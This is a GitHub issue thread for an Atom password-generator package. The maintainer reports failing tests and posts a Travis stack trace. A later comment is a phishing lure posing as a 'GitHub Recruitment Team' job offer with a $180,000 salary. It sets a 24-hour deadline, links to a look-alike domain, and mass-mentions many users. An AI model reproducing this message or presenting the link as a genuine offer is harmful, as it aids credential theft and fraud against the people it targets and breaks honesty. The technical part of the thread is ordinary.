### ISSUE TITLE
fix tests

### ISSUE THREAD

**Issue by maxkoryukov** [maxkoryukov/atom-password-generator#5]
tests/specs are failed now. They are correct (I hope), but I can't run tests in `Atom` environment.

**Comment by maxkoryukov** [comment]
```
  1) AtomPasswordGenerator "before each" hook for "should change text in editor":
     Error: Failed to load package 'atom-password-generator'
      at PackageManager.module.exports.PackageManager.activatePackage (/home/travis/atom/usr/share/atom/resources/app/src/package-manager.js:662:31)
      at Context.<anonymous> (/home/travis/build/maxkoryukov/atom-password-generator/spec/password-generator.test.js:11:24)
      at runCallback (timers.js:574:20)
      at tryOnImmediate (timers.js:554:5)
      at processImmediate [as _immediateCallback] (timers.js:533:5)
```

**Comment by ULis3h** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
vasylchenko, @xiaol0ng, @yjsin96, @tan-zixuan, @mzyan11, @edmond-huang, @IaintGotaName, @dyba, @onemu02, @wantaekchoi, @mptm436, @xbc30, @quaangle, @StephanieIlievaa, @Rideron85, @Shitikyan, @lichao23, @wudeng, @xiaofenqin, @simonlleeee
